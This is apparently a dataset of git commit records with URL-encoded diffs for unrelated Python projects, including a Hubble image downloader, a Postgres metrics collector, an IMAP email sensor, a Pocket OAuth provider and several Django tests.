+import urllib%0Aimport os%0A%0Adef fetchImages(start, stop):%0A counter = 0%0A imgIndex = start%0A for i in range(start, start+stop+1):%0A urllib.urlretrieve(%22%22+str(imgIndex)+%22.jpg%22, str(imgIndex)+%22.jpg%22)%0A print(%22Image# %22+str(counter)+%22 of %22+str(stop)+%22 captured.%22)%0A counter += 1%0A imgIndex += 1%0A print(%22Finished%22)%0A%0Adef pathFolder():%0A cur_folder = os.getcwd()%0A if not os.path.exists(cur_folder+%22/space/hubble/%22):%0A print(%22Wait.. Folder not found!%5Cn%22)%0A print(%22Creating a new folder...%5Cn%22)%0A os.makedirs(cur_folder+%22/space/hubble/%22)%0A os.chdir(cur_folder+%22/space/hubble/%22)%0A else:%0A os.chdir(cur_folder+%22/space/hubble/%22)%0A%0Adef main():%0A print(%22Random Images Capture from Hubble Telescope%5Cn%22)%0A start = raw_input(%22Pick a random number?:%5Cn%22)%0A stop = raw_input(%22How many images do you want to download?: %22)%0A print(%22Capturing images...%5Cn%22)%0A pathFolder()%0A fetchImages(int(start), int(stop))%0A%0Amain()%0A
|
|
62296474a389f684dbc1b66fb5256d494111b7c9
|
Add a script to reproduce ezio issue #4
|
SocketABC/ezio_issue4_reproduce.py
|
SocketABC/ezio_issue4_reproduce.py
|
Python
| 0
|
@@ -0,0 +1,675 @@
+# -*- coding: utf-8 -*-%0A%0Aimport hashlib%0Aimport socket%0Aimport struct%0A%0ASERVER_NAME = 'localhost'%0ASERVER_PORT = 9876%0A%0Adef main():%0A client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)%0A client_socket.connect((SERVER_NAME, SERVER_PORT))%0A%0A msg_len = 1600%0A payload = 'a' * msg_len%0A msg = struct.pack('!Q', msg_len) + payload.encode('utf-8')%0A%0A client_socket.sendall(msg)%0A print('data sent')%0A%0A pin = client_socket.recv(256)%0A print(len(pin))%0A print('received hash: %5Ct' + pin.decode('utf-8'))%0A%0A md5 = hashlib.md5()%0A md5.update(payload.encode('utf-8'))%0A print('local hash: %5Ct' + md5.hexdigest())%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
6d93e603cd45544e296b8cd90853377688af6376
|
Add median/LoG filter fcn
|
imgphon/ultrasound.py
|
imgphon/ultrasound.py
|
Python
| 0.000001
|
@@ -0,0 +1,778 @@
+import numpy as np%0Afrom scipy.ndimage import median_filter%0Afrom scipy.ndimage.filters import gaussian_laplace%0A%0Adef clean_frame(frame, median_radius=5, log_sigma=4):%0A %22%22%22%0A Input: ndarray image, filter kernel settings%0A Output: cleaned ndarray image%0A A median filter is used to remove speckle noise, %0A followed by edge sharpening with a Laplacian %0A of Gaussian (LoG) mask.%0A %22%22%22%0A%0A # TODO scale input image in range (0,1)%0A # TODO provide default for median_radius that is %0A # sensitive to image dimensions%0A%0A frame = frame.astype(np.int64)%0A medfilt = median_filter(frame, median_radius)%0A logmask = gaussian_laplace(medfilt, log_sigma)%0A cleaned = medfilt + logmask%0A cleaned = cleaned.astype(np.uint8)%0A %0A return cleaned
|
|
ca3add180e8dc124e9ebec35682215a6de0ae9b1
|
Add test_poly_divide script.
|
research/test_poly_divide.py
|
research/test_poly_divide.py
|
Python
| 0
|
@@ -0,0 +1,913 @@
+%0A# use time() instead on unix%0Aimport sys%0Aif sys.platform=='win32':%0A from time import clock%0Aelse:%0A from time import time as clock%0A%0Afrom sympycore import profile_expr%0A%0Adef time1(n=500):%0A import sympycore as sympy%0A w = sympy.Fraction(3,4)%0A x = sympy.polynomials.poly(%5B0, 1, 1%5D)%0A a = (x-1)*(x-2)*(x-3)*(x-4)*(x-5)%0A b = (x-1)*(x-2)*(x-w)%0A t1 = clock()%0A while n:%0A divmod(a, b)%0A n -= 1%0A t2 = clock()%0A return 100 / (t2-t1)%0A%0Adef time2(n=500):%0A import sympycore as sympy%0A w = sympy.Fraction(3,4)%0A x = sympy.polynomials.PolynomialRing%5B1%5D(%5B0, 1, 1%5D)%0A a = (x-1)*(x-2)*(x-3)*(x-4)*(x-5)%0A b = (x-1)*(x-2)*(x-w)%0A t1 = clock()%0A while n:%0A divmod(a, b)%0A n -= 1%0A t2 = clock()%0A return 100 / (t2-t1)%0A%0Adef timing():%0A t1 = time1()%0A t2 = time2()%0A return t1, t2, t1/t2%0A%0Aprint timing()%0Aprint timing()%0Aprint timing()%0A%0Aprofile_expr('time2(50)')%0A
|
|
8adbbc365042d49c1304610b3425e0974b1c6451
|
Switch a little of the html generation to jinja2
|
blaze/server/datashape_html.py
|
blaze/server/datashape_html.py
|
from ..datashape import DataShape, Record, Fixed, Var, CType, String, JSON
#from blaze_server_config import jinja_env
#from jinja2 import Template
def json_comment(array_url):
return '<font style="font-size:x-small"> # <a href="' + \
array_url + '?r=data.json">JSON</a></font>\n'
def render_datashape_recursive(base_url, ds, indent):
result = ''
if isinstance(ds, DataShape):
for dim in ds[:-1]:
if isinstance(dim, Fixed):
result += ('%d, ' % dim)
elif isinstance(dim, Var):
result += 'var, '
else:
raise TypeError('Cannot render datashape with dimension %r' % dim)
result += render_datashape_recursive(base_url, ds[-1], indent)
elif isinstance(ds, Record):
result += '{' + json_comment(base_url)
for fname, ftype in zip(ds.names, ds.types):
child_url = base_url + '.' + fname
child_result = render_datashape_recursive(child_url,
ftype, indent + ' ')
result += (indent + ' ' +
'<a href="' + child_url + '">' + str(fname) + '</a>'
': ' + child_result + ';')
if isinstance(ftype, Record):
result += '\n'
else:
result += json_comment(child_url)
result += (indent + '}')
elif isinstance(ds, (CType, String, JSON)):
result += str(ds)
else:
raise TypeError('Cannot render datashape %r' % ds)
return result
def render_datashape(base_url, ds):
print('base url is %s' % base_url)
result = render_datashape_recursive(base_url, ds, '')
result = '<pre>\ntype <a href="' + base_url + \
'?r=datashape">BlazeDataShape</a> = ' + result + '\n</pre>'
return result
|
Python
| 0.000001
|
@@ -111,17 +111,16 @@
nja_env%0A
-#
from jin
@@ -140,20 +140,16 @@
mplate%0A%0A
-def
json_com
@@ -156,33 +156,29 @@
ment
-(array_url):%0A return '
+_templ = Template(%22%22%22
%3Cfon
@@ -221,35 +221,20 @@
ef=%22
-' + %5C%0A array_url + '
+%7B%7Bbase_url%7D%7D
?r=d
@@ -258,19 +258,151 @@
%3E%3C/font%3E
-%5Cn'
+%0A%0A%22%22%22)%0A%0Adatashape_outer_templ = Template(%22%22%22%0A%3Cpre%3E%0Atype %3Ca href=%22%7B%7Bbase_url%7D%7D?r=datashape%22%3EBlazeDataShape%3C/a%3E = %7B%7Bds_html%7D%7D%0A%3C/pre%3E%0A%22%22%22)
%0A%0Adef re
@@ -922,17 +922,39 @@
_comment
-(
+_templ.render(base_url=
base_url
@@ -1450,17 +1450,39 @@
_comment
-(
+_templ.render(base_url=
child_ur
@@ -1723,53 +1723,15 @@
-print('base url is %25s' %25 base_url)%0A result
+ds_html
= r
@@ -1784,140 +1784,74 @@
re
-sult = '%3Cpre%3E%5Cntype %3Ca href=%22' + base_url + %5C%0A '?r=datashape%22%3EBlazeDataShape%3C/a%3E = ' + result + '%5Cn%3C/pre%3E'%0A return result
+turn datashape_outer_templ.render(base_url=base_url, ds_html=ds_html)
%0A
|
ce1921e079b68c250b6bc979e67c478b94747688
|
Change the order of metric name components
|
src/collectors/postgres/postgres.py
|
src/collectors/postgres/postgres.py
|
# coding=utf-8
"""
Collect metrics from postgresql
#### Dependencies
* psycopg2
"""
import diamond.collector
try:
import psycopg2
psycopg2 # workaround for pyflakes issue #13
except ImportError:
psycopg2 = None
class PostgresqlCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = super(PostgresqlCollector, self).get_default_config_help()
config_help.update({
'host': 'Hostname',
'user': 'Username',
'password': 'Password',
'port': 'Port number',
'underscore': 'Convert _ to .'
})
return config_help
def get_default_config(self):
"""
Return default config.
"""
config = super(PostgresqlCollector, self).get_default_config()
config.update({
'path': 'postgres',
'host': 'localhost',
'user': 'postgres',
'password': 'postgres',
'port': 5432,
'underscore': False,
'method': 'Threaded'})
return config
def collect(self):
if psycopg2 is None:
self.log.error('Unable to import module psycopg2')
return {}
self.conn_string = "host=%s user=%s password=%s port=%s" % (
self.config['host'],
self.config['user'],
self.config['password'],
self.config['port'])
self.conn = psycopg2.connect(self.conn_string)
self.cursor = self.conn.cursor()
# Statistics
self.cursor.execute("SELECT pg_stat_database.*, \
pg_database_size(pg_database.datname) AS size \
FROM pg_database JOIN pg_stat_database \
ON pg_database.datname = pg_stat_database.datname \
WHERE pg_stat_database.datname \
NOT IN ('template0','template1','postgres')")
stats = self.cursor.fetchall()
# Connections
self.cursor.execute("SELECT datname, count(datname) \
FROM pg_stat_activity GROUP BY pg_stat_activity.datname;")
connections = self.cursor.fetchall()
ret = {}
for stat in stats:
info = {'numbackends': stat[2],
'xact_commit': stat[3],
'xact_rollback': stat[4],
'blks_read': stat[5],
'blks_hit': stat[6],
'tup_returned': stat[7],
'tup_fetched': stat[8],
'tup_inserted': stat[9],
'tup_updated': stat[10],
'tup_deleted': stat[11],
'conflicts': stat[12],
'size': stat[14]}
database = stat[1]
ret[database] = info
for database in ret:
if self.config['underscore']:
database = database.replace("_", ".")
for (metric, value) in ret[database].items():
self.publish("%s.database.%s" % (
database, metric), value)
for (database, connection) in connections:
self.publish("%s.database.connections" % (
database), connection)
self.cursor.close()
self.conn.close()
|
Python
| 0.99894
|
@@ -2990,35 +2990,32 @@
self.publish(%22
-%25s.
database.%25s%22 %25 (
@@ -3009,16 +3009,19 @@
abase.%25s
+.%25s
%22 %25 (%0A
@@ -3146,19 +3146,16 @@
ublish(%22
-%25s.
database
@@ -3155,16 +3155,19 @@
atabase.
+%25s.
connecti
|
711de8a04598fb531b5f70f334633b713dfa76c7
|
Create TypeIt.py
|
TypeIt.py
|
TypeIt.py
|
Python
| 0.000001
|
@@ -0,0 +1,22 @@
+print(%22Hello Daniel%22)%0A
|
|
94151b40c3b862c5ddf57c11228f6c99a8c38a7e
|
Define manage.py to launch app and app-related tasks
|
edx_data_research/web_app/manage.py
|
edx_data_research/web_app/manage.py
|
Python
| 0.000001
|
@@ -0,0 +1,526 @@
+#!/usr/bin/python%0Afrom flask.ext.script import Manager, Server, Shell%0A%0Afrom edx_data_research.web_app import app%0Afrom edx_data_research.web_app.models import User, Role%0A%0Amanager = Manager(app)%0A%0Amanager.add_command('run-server', Server(use_debugger=True, use_reloader=True,%0A host='0.0.0.0'))%0Adef make_shell_context():%0A return dict(app=app, db=db, User=User, Role=Role)%0Amanager.add_command('shell', Shell(make_context=make_shell_context))%0A%0Aif __name__ == '__main__':%0A manager.run()%0A
|
|
ec919af7fba21e98e73e6c435dda4f10e90b82ba
|
Create Vector.py
|
Vector.py
|
Vector.py
|
Python
| 0
|
@@ -0,0 +1,2795 @@
+# The Vector class%0Aclass Vector:%0A%0A # Initialiser%0A def __init__(self, p=(0,0)):%0A self.x = p%5B0%5D%0A self.y = p%5B1%5D%0A%0A # Returns a string representation of the vector%0A def __str__(self):%0A return %22(%22+ str(self.x) + %22,%22 + str(self.y) + %22)%22%0A%0A # Tests the equality of this vector and another%0A def __eq__(self, other):%0A return self.x == other.x and self.y == other.y%0A%0A # Tests the inequality of this vector and another%0A def __ne__(self, other):%0A return not self.__eq__(other)%0A%0A # Returns a tuple with the point corresponding to the vector%0A def getP(self):%0A return (self.x, self.y)%0A%0A # Returns a copy of the vector%0A def copy(self):%0A v = Vector()%0A v.x = self.x%0A v.y = self.y%0A return v%0A%0A # Multiplies the vector by a scalar%0A def mult(self, k):%0A self.x *= k%0A self.y *= k%0A return self%0A%0A # Divides the vector by a scalar%0A def div(self, k):%0A self.x /= k%0A self.y /= k%0A return self%0A%0A # Normalizes the vector%0A def normalise(self):%0A v = math.sqrt(self.x**2 + self.y**2)%0A self.x /= v%0A self.y /= v%0A%0A # Returns a normalized version of the vector%0A def getNormalised(self):%0A return (self.x/math.sqrt(math.pow(self.x, 2)+math.pow(self.y, 2)), self.y/math.sqrt(math.pow(self.x, 2)+math.pow(self.y, 2)))%0A%0A def getNormal(self):%0A return Vector(self.getNormalised())%0A%0A%0A # Adds another vector to this vector%0A def add(self, other):%0A self.x += other.x%0A self.y += other.y%0A return self%0A%0A # Subtracts another vector from this vector%0A def sub(self, other):%0A self.x -= other.x%0A self.y -= other.y%0A return self%0A%0A # Returns the zero vector%0A def zero(self):%0A self.x = 0%0A self.y = 0%0A return self%0A%0A # Negates the vector (makes it point in the opposite direction)%0A def negate(self):%0A self.x = -self.x%0A self.y = -self.y%0A return self%0A%0A # Returns the dot product of this vector with another one%0A def dot(self, other):%0A return self.x*other.x + self.y*other.y%0A%0A # 
Returns the length of the vector%0A def length(self):%0A return math.sqrt(self.lengthSquared())%0A%0A # Returns the squared length of the vector%0A def lengthSquared(self):%0A return self.x**2 + self.y**2%0A%0A # Reflect this vector on a normal%0A def reflect(self, normal):%0A n = normal.copy()%0A n.mult(2*self.dot(normal))%0A self.sub(n)%0A return self%0A%0A # Returns the angle between this vector and another one%0A def angle(self, other):%0A a = math.sqrt(self.x**2 + self.y**2)%0A b = math.sqrt(math.pow(other.x, 2) + math.pow(other.y, 2))%0A return math.acos((self.x*other.x+self.y*other.y)/(a*b))%0A
|
|
a70abcdd95612fe3df4fc3dd9c4ae8151add5a28
|
add an example file
|
example.py
|
example.py
|
Python
| 0.000001
|
@@ -0,0 +1,1713 @@
+import numpy as np%0Afrom pyscatter3d import pyscatter3d%0A%0AX0,Y0 = np.meshgrid(np.linspace(-3,3,50), np.linspace(-3,3,50))%0AD = np.sqrt(X0**2+Y0**2) # radial distance%0AZ0 = np.sinc(D)%0A%0A_ = np.random.randn(3, 1e3)%0AX1,Y1,Z1 = _/np.linalg.norm(_, axis=0)%0A%0Anp.savetxt('sinc.csv', np.array(%5Barr.flatten() for arr in %5BX0,Y0,Z0,1/D%5D%5D).T,%0A delimiter=',', header='X,Y,Z,inv_dist', comments='')%0A%0Anp.savetxt('sphere.csv', np.array(%5Barr.flatten() for arr in %5BX1,Y1,Z1%5D%5D).T,%0A delimiter=',', header='X,Y,Z', comments='')%0A%0Acsv_dir = '/home/vsokolov/Projects/g35.39/tables/'%0A# dataset names and their corresponding filenames%0Adatasets = %7B'sinc' : 'sinc.csv',%0A 'sphere': 'sphere.csv'%7D%0A%0A# what column names to use as X/Y/Z values%0Awhich_x, which_y, which_z = 'X', 'Y', 'Z'%0A# which_s controls the marker size%0Awhich_s = 'inv_dist'%0A%0A# output file name (without an extension)%0Aoutfile = 'example'%0A%0Adefault_size = %7B'matplotlib': 30, %0A 'plotly' : 10 %7D%0A%0Aline2text = %7B'sinc': 'sinc(x)', 'sphere': 'sphere' %7D%0Aline2color = %7B'sinc': '#e41a1c', 'sphere': '#377eb8'%7D%0A%0A# NOTE: the 'star' symbol doesn't work with plotly scatter3d :C%0A# see here: https://github.com/plotly/plotly.py/issues/454%0A# supported marker symbols in plotly scatter-3d:%0A# (enumerated: %22circle%22 %7C %22circle-open%22 %7C %22square%22 %7C %22square-open%22 %7C %0A# %22diamond%22 %7C %22diamond-open%22 %7C %22cross%22 %7C %22x%22 )%0Aline2symbol = %7B'matplotlib': %7B'sphere': 'd', 'sinc': 'o' %7D,%0A 'plotly' : %7B'sphere': 'diamond', 'sinc': 'circle'%7D %7D%0A%0Apyscatter3d(datasets, line2text, line2color, line2symbol,%0A which_x, which_y, which_z, which_s, default_size,%0A outfile=outfile, backend='both')%0A
|
|
28e6c21e2a8bc78a6f4292eef2daec4b70d0b887
|
Add support for Pocket
|
services/pocket.py
|
services/pocket.py
|
Python
| 0
|
@@ -0,0 +1,1725 @@
+from werkzeug.urls import url_decode%0Aimport requests%0Aimport foauth.providers%0A%0A%0Aclass Pocket(foauth.providers.OAuth2):%0A # General info about the provider%0A provider_url = 'http://getpocket.com/'%0A docs_url = 'http://getpocket.com/developer/docs/overview'%0A category = 'News'%0A%0A # URLs to interact with the API%0A request_token_url = 'https://getpocket.com/v3/oauth/request'%0A authorize_url = 'https://getpocket.com/auth/authorize'%0A access_token_url = 'https://getpocket.com/v3/oauth/authorize'%0A api_domain = 'getpocket.com'%0A%0A available_permissions = %5B%0A (None, 'access your saved articles'),%0A %5D%0A supports_state = False%0A%0A def get_authorize_params(self, redirect_uri, scopes):%0A params = super(Pocket, self).get_authorize_params(redirect_uri, scopes)%0A r = requests.post(self.request_token_url, data=%7B%0A 'consumer_key': params%5B'client_id'%5D,%0A 'redirect_uri': redirect_uri,%0A %7D)%0A data = url_decode(r.content)%0A redirect_uri = '%25s&code=%25s' %25 (params%5B'redirect_uri'%5D, data%5B'code'%5D)%0A return %7B%0A 'request_token': data%5B'code'%5D,%0A 'redirect_uri': redirect_uri,%0A %7D%0A%0A def get_access_token_response(self, redirect_uri, data):%0A return requests.post(self.get_access_token_url(), %7B%0A 'consumer_key': self.client_id,%0A 'code': data%5B'code'%5D,%0A 'redirect_uri': redirect_uri%0A %7D)%0A%0A def parse_token(self, content):%0A data = url_decode(content)%0A data%5B'service_user_id'%5D = data%5B'username'%5D%0A return data%0A%0A def bearer_type(self, token, r):%0A r.prepare_url(r.url, %7B'consumer_key': self.client_id, 'access_token': token%7D)%0A return r%0A
|
|
e42b22dc0a71fb5c7572ca69c63ab6a7b0ba8479
|
add error handling for celery tasks
|
src/helfertool/tasks.py
|
src/helfertool/tasks.py
|
Python
| 0.000001
|
@@ -0,0 +1,626 @@
+from __future__ import absolute_import%0A%0Afrom celery.signals import task_failure%0A%0Afrom django.conf import settings%0Afrom django.core.mail import mail_admins%0Afrom django.views.debug import ExceptionReporter%0A%0A%0A@task_failure.connect%0Adef celery_error_handler(task_id, exception, traceback, einfo, *args, **kwargs):%0A if settings.DEBUG:%0A return%0A%0A mail_subject = %22Task exception - %7B%7D%22.format(exception)%0A mail_subject = mail_subject.replace(%22%5Cn%22, %22 %22)%5B:250%5D%0A%0A reporter = ExceptionReporter(None, einfo.type, exception, traceback)%0A mail_text = reporter.get_traceback_text()%0A%0A mail_admins(mail_subject, mail_text)%0A
|
|
73f75483156056b61f3b6bec4fe2f09522c2c34a
|
Add tests for mixin order
|
test/integration/ggrc/models/test_eager_query.py
|
test/integration/ggrc/models/test_eager_query.py
|
Python
| 0
|
@@ -0,0 +1,1394 @@
+# Copyright (C) 2016 Google Inc., authors, and contributors %3Csee AUTHORS file%3E%0A# Licensed under http://www.apache.org/licenses/LICENSE-2.0 %3Csee LICENSE file%3E%0A# Created By: miha@reciprocitylabs.com%0A# Maintained By: miha@reciprocitylabs.com%0A%0A%22%22%22Tests for making sure eager queries are working on all mixins.%22%22%22%0A%0Afrom ggrc.models import all_models%0Afrom ggrc.models import mixins%0Afrom integration.ggrc import TestCase%0A%0A%0Aclass TestAllModels(TestCase):%0A %22%22%22Test basic model structure for all models%22%22%22%0A%0A def test_all_model_mro(self):%0A %22%22%22Test the correct mixin order for eager queries.%0A%0A This test checks that all models that have an eager query, have the last%0A mixin in the mro Identifiable. If there are any other mixins with eager%0A query after it, the eager query on those is ignored and that is an error.%0A %22%22%22%0A errors = set()%0A for model in all_models.all_models:%0A eager = %5Bmixin for mixin in model.mro()%0A if hasattr(mixin, %22eager_query%22)%5D%0A if eager:%0A try:%0A self.assertEqual(%0A eager%5B-1%5D, mixins.Identifiable,%0A %22Model %7B%7D, has wrong mixin order. The last mixin with %22%0A %22eager_query is '%7B%7D' instead of 'Identifiable'.%22.format(%0A model.__name__, eager%5B-1%5D.__name__),%0A )%0A except AssertionError as error:%0A errors.add(error)%0A self.assertEqual(set(), errors)%0A
|
|
6ed99163b10209566a0575a9a67d1ab2ad552fd9
|
Add test for committee subscriptions page
|
tests/views/test_committee_subscriptions_page.py
|
tests/views/test_committee_subscriptions_page.py
|
Python
| 0
|
@@ -0,0 +1,666 @@
+import datetime%0Afrom tests import PMGLiveServerTestCase%0Afrom tests.fixtures import dbfixture, HouseData, CommitteeData%0A%0ATHIS_YEAR = datetime.datetime.today().year%0A%0A%0Aclass TestCommitteeSubscriptionsPage(PMGLiveServerTestCase):%0A def test_committee_subscriptions_page(self):%0A %22%22%22%0A Test committee subscriptions page (/committee-subscriptions)%0A %22%22%22%0A self.make_request(%22/committee-subscriptions%22, follow_redirects=True)%0A self.assertIn(%0A %22Access to meeting reports for premium committees from before %7B%7D is freely accessible to everyone.%22.format(%0A THIS_YEAR - 1%0A ),%0A self.html,%0A )%0A
|
|
5e9b6bc60f0f81db3ed451eb89c23b77888e1167
|
Update a comment
|
djangae/db/backends/appengine/expressions.py
|
djangae/db/backends/appengine/expressions.py
|
from django.db.models.expressions import F
from djangae.db.utils import get_prepared_db_value
# Maps a Django F-expression connector constant to the equivalent Python
# binary operation; used by evaluate_expression below to combine the two
# recursively-evaluated sides of an arithmetic expression node.
CONNECTORS = {
    F.ADD: lambda l, r: l + r,
    F.SUB: lambda l, r: l - r,
    F.MUL: lambda l, r: l * r,
    F.DIV: lambda l, r: l / r,
}
def evaluate_expression(expression, instance, connection):
    """Evaluate a (limited) Django F-expression tree against ``instance``.

    Literals pass straight through, field references (nodes with a ``name``)
    are resolved to the instance's original database-prepared value, wrapped
    constants (nodes with a ``value``) are unwrapped, and the arithmetic
    connectors listed in CONNECTORS are applied recursively.

    Expressions are evaluated before the database call, so this does not
    provide race-condition protection -- but neither does our update()
    implementation, so this exists for convenience.

    Raises NotImplementedError for any expression node it cannot handle.
    """
    # basestring only exists on Python 2; fall back to str elsewhere so the
    # literal check keeps working on both interpreters.
    try:
        string_type = basestring  # noqa: F821 -- Python 2 builtin
    except NameError:
        string_type = str

    if isinstance(expression, (string_type, int, float)):
        # Plain literal value -- nothing to evaluate.
        return expression

    if hasattr(expression, 'name'):
        # F('field') reference: look up the field and return the value the
        # instance originally loaded from the database.
        field = instance._meta.get_field(expression.name)
        return get_prepared_db_value(connection, instance._original, field)

    if hasattr(expression, 'value'):
        # Wrapped constant node.
        return expression.value

    if hasattr(expression, 'connector') and expression.connector in CONNECTORS:
        # Arithmetic node: evaluate both operands recursively and combine.
        # Django versions differ on where the operands live.
        if hasattr(expression, 'children'):
            lhs, rhs = expression.children
        else:
            lhs, rhs = expression.lhs, expression.rhs

        return CONNECTORS[expression.connector](
            evaluate_expression(lhs, instance, connection),
            evaluate_expression(rhs, instance, connection),
        )

    # Bug fix: the message was previously passed as two positional arguments
    # ("...%r...", expression) without interpolation, so the exception text
    # was an unformatted tuple. Interpolate explicitly instead.
    raise NotImplementedError(
        "Support for expression %r isn't implemented" % (expression,))
|
Python
| 0
|
@@ -351,22 +351,14 @@
ns.
-Although they'
+This a
re e
@@ -365,16 +365,23 @@
valuated
+ within
%0A
@@ -385,175 +385,81 @@
-before the database call, so they don't provide the race condition protection,%0A but neither does our update() implementation so we provide this for convenience.
+the get/put transaction in _update_entity so these will happen atomically
%0A
@@ -463,16 +463,17 @@
%22%22%22%0A
+%0A
if i
|
e53f0f4b0f541adf6b8a9df3c2a2af2c8b306720
|
Fix lint.
|
packs/email/sensors/imap_sensor.py
|
packs/email/sensors/imap_sensor.py
|
import hashlib
import base64
import eventlet
import easyimap
from flanker import mime
from st2reactor.sensor.base import PollingSensor
# Public API of this module.
__all__ = [
    'IMAPSensor'
]

# Monkey-patch blocking stdlib modules so network I/O performed by the IMAP
# library cooperates with eventlet green threads instead of blocking them.
eventlet.monkey_patch(
    os=True,
    select=True,
    socket=True,
    thread=True,
    time=True)

# Defaults used when a mailbox configuration omits these settings.
DEFAULT_DOWNLOAD_ATTACHMENTS = False
DEFAULT_MAX_ATTACHMENT_SIZE = 1024  # bytes; larger attachments are skipped
DEFAULT_ATTACHMENT_DATASTORE_TTL = 1800  # seconds
class IMAPSensor(PollingSensor):
    """Polling sensor that watches IMAP mailboxes for unread messages.

    Each unread message dispatches an ``email.imap.message`` trigger.
    Attachments can optionally be downloaded and stored in the datastore
    (base64-encoded unless they are text/plain).
    """

    def __init__(self, sensor_service, config=None, poll_interval=30):
        super(IMAPSensor, self).__init__(sensor_service=sensor_service,
                                         config=config,
                                         poll_interval=poll_interval)

        self._trigger = 'email.imap.message'
        self._logger = self._sensor_service.get_logger(__name__)

        # Attachments larger than this (bytes) are not stored.
        self._max_attachment_size = self._config.get(
            'max_attachment_size', DEFAULT_MAX_ATTACHMENT_SIZE)
        # Bug fix: this previously defaulted to DEFAULT_MAX_ATTACHMENT_SIZE
        # (a byte count) instead of DEFAULT_ATTACHMENT_DATASTORE_TTL due to
        # a copy/paste error, giving stored attachments a 1024 s TTL.
        self._attachment_datastore_ttl = self._config.get(
            'attachment_datastore_ttl', DEFAULT_ATTACHMENT_DATASTORE_TTL)

        # Maps mailbox name -> {'connection': ..., 'download_attachments': ...}
        self._mailboxes = {}

    def setup(self):
        """Open a connection to every configured mailbox."""
        self._logger.debug('[IMAPSensor]: entering setup')

        if 'imap_mailboxes' in self._config:
            self._parse_mailboxes(self._config['imap_mailboxes'])

    def poll(self):
        """Check each mailbox for unread messages and dispatch triggers."""
        self._logger.debug('[IMAPSensor]: entering poll')

        for name, values in self._mailboxes.items():
            mailbox = values['connection']
            download_attachments = values['download_attachments']
            self._poll_for_unread_messages(
                name=name, mailbox=mailbox,
                download_attachments=download_attachments)

    def cleanup(self):
        """Disconnect from every mailbox."""
        self._logger.debug('[IMAPSensor]: entering cleanup')

        for name, values in self._mailboxes.items():
            mailbox = values['connection']
            self._logger.debug('[IMAPSensor]: Disconnecting from {0}'.format(name))
            mailbox.quit()

    def add_trigger(self, trigger):
        # Triggers are statically defined for this sensor; nothing to do.
        pass

    def update_trigger(self, trigger):
        pass

    def remove_trigger(self, trigger):
        pass

    def _parse_mailboxes(self, mailboxes):
        """Validate each mailbox config and open an IMAP connection for it.

        Entries without credentials or a server are skipped with a debug
        message; a connection failure raises with the mailbox name included.
        """
        for mailbox, config in mailboxes.items():
            server = config.get('server', 'localhost')
            port = config.get('port', 143)
            user = config.get('username', None)
            password = config.get('password', None)
            folder = config.get('mailbox', 'INBOX')
            ssl = config.get('ssl', False)
            download_attachments = config.get('download_attachments',
                                              DEFAULT_DOWNLOAD_ATTACHMENTS)

            if not user or not password:
                # Fix: these messages were triple-quoted across lines and so
                # contained embedded newlines and stray indentation.
                self._logger.debug(
                    '[IMAPSensor]: Missing username/password for '
                    '{0}'.format(mailbox))
                continue

            if not server:
                self._logger.debug(
                    '[IMAPSensor]: Missing server for {0}'.format(mailbox))
                continue

            try:
                connection = easyimap.connect(server, user, password,
                                              folder, ssl=ssl, port=port)
            except Exception as e:
                message = 'Failed to connect to mailbox "%s": %s' % (mailbox, str(e))
                raise Exception(message)

            item = {
                'connection': connection,
                'download_attachments': download_attachments
            }
            self._mailboxes[mailbox] = item

    def _poll_for_unread_messages(self, name, mailbox, download_attachments=False):
        """Process every unread message in ``mailbox``."""
        self._logger.debug('[IMAPSensor]: polling mailbox {0}'.format(name))

        for message in mailbox.unread():
            self._process_message(uid=message.uid, mailbox=mailbox,
                                  download_attachments=download_attachments)
        return

    def _process_message(self, uid, mailbox,
                         download_attachments=DEFAULT_DOWNLOAD_ATTACHMENTS):
        """Build the trigger payload for one message and dispatch it."""
        message = mailbox.mail(uid, include_raw=True)
        mime_msg = mime.from_string(message.raw)

        body = message.body
        sent_from = message.from_addr
        sent_to = message.to
        subject = message.title
        date = message.date
        message_id = message.message_id
        headers = mime_msg.headers.items()
        has_attachments = bool(message.attachments)

        payload = {
            'uid': uid,
            'from': sent_from,
            'to': sent_to,
            'headers': headers,
            'date': date,
            'subject': subject,
            'message_id': message_id,
            'body': body,
            'has_attachments': has_attachments,
            'attachments': []
        }

        if has_attachments and download_attachments:
            self._logger.debug(
                '[IMAPSensor]: Downloading attachments for message {}'.format(uid))
            result = self._download_and_store_message_attachments(message=message)
            payload['attachments'] = result

        self._sensor_service.dispatch(trigger=self._trigger, payload=payload)

    def _download_and_store_message_attachments(self, message):
        """
        Method which downloads the provided message attachments and stores
        them in a datastore.

        :rtype: ``list`` of ``dict``
        """
        attachments = message.attachments

        result = []
        for (file_name, content, content_type) in attachments:
            attachment_size = len(content)
            if attachment_size > self._max_attachment_size:
                self._logger.debug(
                    ('[IMAPSensor]: Skipping attachment "{}" since its bigger '
                     'than maximum allowed size ({})'.format(file_name,
                                                             attachment_size)))
                continue

            datastore_key = self._get_attachment_datastore_key(
                message=message, file_name=file_name)

            # Store attachment in the datastore; binary content is
            # base64-encoded since the datastore stores text values.
            if content_type == 'text/plain':
                value = content
            else:
                value = base64.b64encode(content)

            self._sensor_service.set_value(name=datastore_key, value=value,
                                           ttl=self._attachment_datastore_ttl,
                                           local=False)

            item = {
                'file_name': file_name,
                'content_type': content_type,
                'datastore_key': datastore_key
            }
            result.append(item)

        return result

    def _get_attachment_datastore_key(self, message, file_name):
        """Return a stable datastore key for one attachment (md5 of uid+name)."""
        key = '%s-%s' % (message.uid, file_name)
        key = 'attachments-%s' % (hashlib.md5(key).hexdigest())
        return key
|
Python
| 0.000001
|
@@ -915,33 +915,32 @@
-
DEFAULT_MAX_ATTA
@@ -5746,16 +5746,92 @@
le_name,
+%0A
attachm
|
37e59cbd7e8b4901644adcb73a7f491247fdea69
|
Add py-pyperclip package (#12375)
|
var/spack/repos/builtin/packages/py-pyperclip/package.py
|
var/spack/repos/builtin/packages/py-pyperclip/package.py
|
Python
| 0
|
@@ -0,0 +1,595 @@
